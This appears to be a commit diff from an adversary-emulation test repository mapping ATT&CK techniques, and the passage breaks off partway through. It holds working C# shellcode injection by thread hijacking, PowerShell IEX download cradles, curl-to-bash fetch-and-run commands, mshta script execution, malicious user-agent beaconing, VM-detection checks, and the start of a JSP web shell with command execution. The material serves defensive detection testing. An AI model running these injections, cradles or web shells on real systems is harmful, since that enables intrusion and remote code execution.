0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
};
// Once shellcode has executed return to thread original EIP address (mov to rax then jmp to address)
byte[] mov_rax = new byte[2] {
0x48, 0xb8
};
byte[] jmp_address = BitConverter.GetBytes(tContext.Rip);
byte[] jmp_rax = new byte[2] {
0xff, 0xe0
};
// Build shellcode
byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
payload.CopyTo(shellcode, 0);
mov_rax.CopyTo(shellcode, payload.Length);
jmp_address.CopyTo(shellcode, payload.Length+mov_rax.Length);
jmp_rax.CopyTo(shellcode, payload.Length+mov_rax.Length+jmp_address.Length);
// OpenProcess to allocate memory
IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
// Allocate memory for shellcode within process
IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Write shellcode within process
UIntPtr bytesWritten;
bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
// Read memory to view shellcode
int bytesRead = 0;
byte[] buffer = new byte[shellcode.Length];
ReadProcessMemory(procHandle, allocMemAddress, buffer, buffer.Length, ref bytesRead);
// Set context EIP to location of shellcode
tContext.Rip=(ulong)allocMemAddress.ToInt64();
// Apply new context to suspended thread
if(!SetThreadContext(pOpenThread, ref tContext))
{
}
if (GetThreadContext(pOpenThread, ref tContext))
{
}
// Resume the thread, redirecting execution to shellcode, then back to original process
ResumeThread(pOpenThread);
return 0;
}
}
public class Program
{
public static void Main()
{
//Test One:
Console.WriteLine("{0}", "#1 ProcessInject");
ProcessInject.Inject();
Console.WriteLine("{0}", "ProcessInject Complete");
//Test Two:
Console.WriteLine("{0}", "#2 ApcInjectionAnyProcess");
ApcInjectionAnyProcess.Inject();
Console.WriteLine("{0}", "ApcInjectionAnyProcess Complete");
//Test Three:
Console.WriteLine("{0}", "#3 ApcInjectionNewProcess");
ApcInjectionNewProcess.Inject();
Console.WriteLine("{0}", "ApcInjectionNewProcess Complete");
//Test Four:
Console.WriteLine("{0}", "#4 IatInjection");
IatInjection.Inject();
Console.WriteLine("{0}", "IatInjection Complete");
//Test Five:
Console.WriteLine("{0}", "#5 ThreadHijack");
ThreadHijack.Inject();
Console.WriteLine("{0}", "ThreadHijack Complete ");
}
}
atomics/T1071/T1071.md
+57
View File
@@ -0,0 +1,57 @@
# T1071 - Standard Application Layer Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1071)
<blockquote>Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Malicious User Agents](#atomic-test-1---malicious-user-agents)
- [Atomic Test #2 - Malicious User Agents - Nix](#atomic-test-2---malicious-user-agents---nix)
<br/>
## Atomic Test #1 - Malicious User Agents
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `powershell`!
```
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
```
<br/>
<br/>
## Atomic Test #2 - Malicious User Agents - Nix
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `sh`!
```
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
```
<br/>
atomics/T1071/T1071.yaml
+45
View File
@@ -0,0 +1,45 @@
---
attack_technique: T1071
display_name: Standard Application Layer Protocol
atomic_tests:
- name: Malicious User Agents
description: |
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- windows
input_arguments:
domain:
description: Default domain to simulate against
type: string
default: www.google.com
executor:
name: powershell
command: |
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
- name: Malicious User Agents - Nix
description: |
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- linux
- macos
input_arguments:
domain:
description: Default domain to simulate against
type: string
default: www.google.com
executor:
name: sh
command: |
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
atomics/T1074/Discovery.sh
+15
View File
@@ -0,0 +1,15 @@
#!/bin/
curl ifconfig.me
ifconfig
whoami
pwd
ls -lhart /Users/
ls /Applications/
ls /Library/
crontab -l
at -l
netstat -an | grep -i listen
netstat -an | grep -i established
arp -a
ps aux
atomics/T1074/T1074.md
+6 -6
View File
@@ -6,19 +6,19 @@ Interactive command shells may be used, and common functionality within [cmd](ht
## Atomic Tests
- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
- [Atomic Test #1 - Stage data from Discovery.sh](#atomic-test-1---stage-data-from-discoverysh)
<br/>
## Atomic Test #1 - Stage data from Discovery.bat
Utilize powershell to download discovery.bat and save to a local file
## Atomic Test #1 - Stage data from Discovery.sh
Utilize curl to download discovery.sh and execute a basic information gathering shell script
**Supported Platforms:** Windows
**Supported Platforms:** Linux, macOS
#### Run it with `powershell`!
#### Run it with `bash`!
```
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
```
<br/>
atomics/T1074/T1074.yaml
+14
View File
@@ -14,3 +14,17 @@ atomic_tests:
name: powershell
command: |
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
atomic_tests:
- name: Stage data from Discovery.sh
description: |
Utilize curl to download discovery.sh and execute a basic information gathering shell script
supported_platforms:
- linux
- macos
executor:
name: bash
command: |
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
atomics/T1082/T1082.md
+42
View File
@@ -18,6 +18,10 @@ On Mac, the <code>systemsetup</code> command gives a detailed breakdown of the s
- [Atomic Test #3 - List OS Information](#atomic-test-3---list-os-information)
- [Atomic Test #4 - Linux VM Check via Hardware](#atomic-test-4---linux-vm-check-via-hardware)
- [Atomic Test #5 - Linux VM Check via Kernel Modules](#atomic-test-5---linux-vm-check-via-kernel-modules)
<br/>
@@ -62,5 +66,43 @@ uname -a >> /tmp/loot.txt
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
uptime >> /tmp/loot.txt
cat /etc/issue >> /tmp/loot.txt
```
<br/>
<br/>
## Atomic Test #4 - Linux VM Check via Hardware
Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** Linux
#### Run it with `bash`!
```
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"
cat /proc/scsi/scsi | grep -i "vmware\|vbox"
cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"
sudo lspci | grep -i "vmware\|virtualbox"
sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
```
<br/>
<br/>
## Atomic Test #5 - Linux VM Check via Kernel Modules
Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** Linux
#### Run it with `bash`!
```
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
```
<br/>
atomics/T1082/T1082.yaml
+36
View File
@@ -46,3 +46,39 @@ atomic_tests:
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
uptime >> /tmp/loot.txt
cat /etc/issue >> /tmp/loot.txt
- name: Linux VM Check via Hardware
description: |
Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
supported_platforms:
- linux
executor:
name: bash
command: |
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"
cat /proc/scsi/scsi | grep -i "vmware\|vbox"
cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"
sudo lspci | grep -i "vmware\|virtualbox"
sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
- name: Linux VM Check via Kernel Modules
description: |
Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
supported_platforms:
- linux
executor:
name: bash
command: |
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
atomics/T1086/T1086.md
+35 -18
View File
@@ -22,15 +22,17 @@ A number of PowerShell-based offensive testing tools are available, including Em
- [Atomic Test #6 - PowerShell Add User](#atomic-test-6---powershell-add-user)
- [Atomic Test #7 - Powershell MsXml COM object](#atomic-test-7---powershell-msxml-com-object)
- [Atomic Test #7 - Powershell MsXml COM object - no prompt](#atomic-test-7---powershell-msxml-com-object---no-prompt)
- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
- [Atomic Test #8 - Powershell MsXml COM object - with prompt](#atomic-test-8---powershell-msxml-com-object---with-prompt)
- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
- [Atomic Test #9 - Powershell XML requests](#atomic-test-9---powershell-xml-requests)
- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
- [Atomic Test #10 - Powershell invoke mshta.exe download](#atomic-test-10---powershell-invoke-mshtaexe-download)
- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
- [Atomic Test #11 - Powershell Invoke-DownloadCradle](#atomic-test-11---powershell-invoke-downloadcradle)
- [Atomic Test #12 - PowerShell Fileless Script Execution](#atomic-test-12---powershell-fileless-script-execution)
<br/>
@@ -62,11 +64,11 @@ Download Bloodhound and run it
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1|
#### Run it with `command_prompt`!
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Get-BloodHoundData"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```
<br/>
<br/>
@@ -78,11 +80,6 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1|
#### Run it with `powershell`!
```
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
@@ -142,7 +139,7 @@ New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password
<br/>
<br/>
## Atomic Test #7 - Powershell MsXml COM object
## Atomic Test #7 - Powershell MsXml COM object - no prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
@@ -162,7 +159,27 @@ powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Ob
<br/>
<br/>
## Atomic Test #8 - Powershell XML requests
## Atomic Test #8 - Powershell MsXml COM object - with prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `command_prompt`!
```
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
<br/>
## Atomic Test #9 - Powershell XML requests
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell xml download request
@@ -181,7 +198,7 @@ Powershell xml download request
<br/>
<br/>
## Atomic Test #9 - Powershell invoke mshta.exe download
## Atomic Test #10 - Powershell invoke mshta.exe download
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell invoke mshta to download payload
@@ -195,12 +212,12 @@ Powershell invoke mshta to download payload
#### Run it with `powershell`!
```
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:#{url}").Exec();close()"
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
<br/>
<br/>
## Atomic Test #10 - Powershell Invoke-DownloadCradle
## Atomic Test #11 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
@@ -215,7 +232,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
<br/>
<br/>
## Atomic Test #11 - PowerShell Fileless Script Execution
## Atomic Test #12 - PowerShell Fileless Script Execution
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
**Supported Platforms:** Windows
atomics/T1086/T1086.yaml
+24 -10
View File
@@ -32,12 +32,12 @@ atomic_tests:
bloodurl:
description: BloodHound URL
type: url
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
executor:
name: command_prompt
command: |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Get-BloodHoundData"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
- name: Obfuscation Tests
description: |
@@ -47,12 +47,6 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
bloodurl:
description: BloodHound URL
type: url
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
executor:
name: powershell
command: |
@@ -116,7 +110,7 @@ atomic_tests:
command: |
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
- name: Powershell MsXml COM object
- name: Powershell MsXml COM object - no prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
@@ -136,6 +130,26 @@ atomic_tests:
command: |
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
- name: Powershell MsXml COM object - with prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
command: |
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
- name: Powershell XML requests
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -172,7 +186,7 @@ atomic_tests:
executor:
name: powershell
command: |
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:#{url}").Exec();close()"
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
- name: Powershell Invoke-DownloadCradle
description: |
atomics/T1100/T1100.md
+32
View File
@@ -0,0 +1,32 @@
# T1100 - Web Shell
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1100)
<blockquote>A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)
Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Web Shell Written to Disk](#atomic-test-1---web-shell-written-to-disk)
<br/>
## Atomic Test #1 - Web Shell Written to Disk
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot|
| web_shells | Path of Web Shell | path | C:\AtomicRedTeam\atomics\T1100\shells\|
#### Run it with `command_prompt`!
```
xcopy #{web_shells} #{web_shell_path}
```
<br/>
atomics/T1100/T1100.yaml
+26
View File
@@ -0,0 +1,26 @@
---
attack_technique: T1100
display_name: Web Shell
atomic_tests:
- name: Web Shell Written to Disk
description: |
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
supported_platforms:
- windows
input_arguments:
web_shell_path:
description: The path to drop the web shell
type: string
default: C:\inetpub\wwwroot
web_shells:
description: Path of Web Shell
type: path
default: C:\AtomicRedTeam\atomics\T1100\shells\
executor:
name: command_prompt
command: |
xcopy #{web_shells} #{web_shell_path}
atomics/T1100/shells/b.jsp
+1964
View File
@@ -0,0 +1,1964 @@
<%--
Document : Browser
Created on : 3/Out/2011, 21:18:45
Author : jeanfigueiredo
--%>
<%@page import="java.text.DateFormat"%>
<%--
jsp File browser 1.2
Copyright (C) 2003-2006 Boris von Loesch
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or (at your option)
any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the
Free Software Foundation, Inc.,
59 Temple Place, Suite 330,
Boston, MA 02111-1307 USA
- Description: jsp File browser v1.2 -- This JSP program allows remote web-based
file access and manipulation. You can copy, create, move and delete files.
Text files can be edited and groups of files and folders can be downloaded
as a single zip file that's created on the fly.
- Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts
--%>
<%@page import="java.util.*,
java.net.*,
java.text.*,
java.util.zip.*,
java.io.*"
%>
<%!
//FEATURES
private static final boolean NATIVE_COMMANDS = true;
/**
*If true, all operations (besides upload and native commands)
*which change something on the file system are permitted
*/
private static final boolean READ_ONLY = false;
//If true, uploads are allowed even if READ_ONLY = true
private static final boolean ALLOW_UPLOAD = true;
//Allow browsing and file manipulation only in certain directories
private static final boolean RESTRICT_BROWSING = true;
//If true, the user is allowed to browse only in RESTRICT_PATH,
//if false, the user is allowed to browse all directories besides RESTRICT_PATH
private static final boolean RESTRICT_WHITELIST = false;
//Paths, sperated by semicolon
//private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
private static final String RESTRICT_PATH = "/etc;/var";
//The refresh time in seconds of the upload monitor window
private static final int UPLOAD_MONITOR_REFRESH = 2;
//The number of colums for the edit field
private static final int EDITFIELD_COLS = 85;
//The number of rows for the edit field
private static final int EDITFIELD_ROWS = 30;
//Open a new window to view a file
private static final boolean USE_POPUP = true;
/**
* If USE_DIR_PREVIEW = true, then for every directory a tooltip will be
* created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries.
* This can yield to performance issues. Turn it off, if the directory loads to slow.
*/
private static final boolean USE_DIR_PREVIEW = false;
private static final int DIR_PREVIEW_NUMBER = 10;
/**
* The name of an optional CSS Stylesheet file
*/
private static final String CSS_NAME = "Browser.css";
/**
* The compression level for zip file creation (0-9)
* 0 = No compression
* 1 = Standard compression (Very fast)
* ...
* 9 = Best compression (Very slow)
*/
private static final int COMPRESSION_LEVEL = 1;
/**
* The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
* server runs on a windows platform, to avoid a message box, if you try to access
* an empty removable drive (See KNOWN BUGS in Readme.txt).
*/
private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
/**
* Command of the shell interpreter and the parameter to run a programm
*/
private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
//private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix
/**
* Max time in ms a process is allowed to run, before it will be terminated
*/
private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds
//Button names
private static final String SAVE_AS_ZIP = "Download selected files as (z)ip";
private static final String RENAME_FILE = "(R)ename File";
private static final String DELETE_FILES = "(Del)ete selected files";
private static final String CREATE_DIR = "Create (D)ir";
private static final String CREATE_FILE = "(C)reate File";
private static final String MOVE_FILES = "(M)ove Files";
private static final String COPY_FILES = "Cop(y) Files";
private static final String LAUNCH_COMMAND = "(L)aunch external program";
private static final String UPLOAD_FILES = "Upload";
//Normally you should not change anything after this line
//----------------------------------------------------------------------------------
//Change this to locate the tempfile directory for upload (not longer needed)
private static String tempdir = ".";
private static String VERSION_NR = "1.2";
private static DateFormat dateFormat = DateFormat.getDateTimeInstance();
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
//private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
